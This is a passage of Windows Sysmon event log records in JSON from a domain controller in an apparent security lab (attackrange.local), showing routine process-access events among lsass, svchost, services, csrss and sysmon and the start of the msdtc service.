C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3695,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3696,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3697,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.254\r\nProcessGuid: {A837DB8D-023F-5F25-0000-0010947F0500}\r\nProcessId: 804\r\nImage: C:\\Windows\\System32\\msdtc.exe\r\nFileVersion: 2001.12.10941.16384 (rs1_release.160715-1616)\r\nDescription: Microsoft Distributed Transaction Coordinator Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: MSDTC.EXE\r\nCommandLine: C:\\Windows\\System32\\msdtc.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\NETWORK SERVICE\r\nLogonGuid: {A837DB8D-01B5-5F25-0000-0020E4030000}\r\nLogonId: 0x3E4\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.254","ProcessGuid":"{A837DB8D-023F-5F25-0000-0010947F0500}","Image":"C:\\Windows\\System32\\msdtc.exe","FileVersion":"2001.12.10941.16384 (rs1_release.160715-1616)","Description":"Microsoft Distributed Transaction Coordinator Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"MSDTC.EXE","CommandLine":"C:\\Windows\\System32\\msdtc.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\NETWORK SERVICE","LogonGuid":"{A837DB8D-01B5-5F25-0000-0020E4030000}","LogonId":"0x3e4","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3698,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-0010947F0500}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-0010947F0500}","TargetProcessId":"804","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3699,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-0010947F0500}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-0010947F0500}","TargetProcessId":"804","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3700,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3701,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3702,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
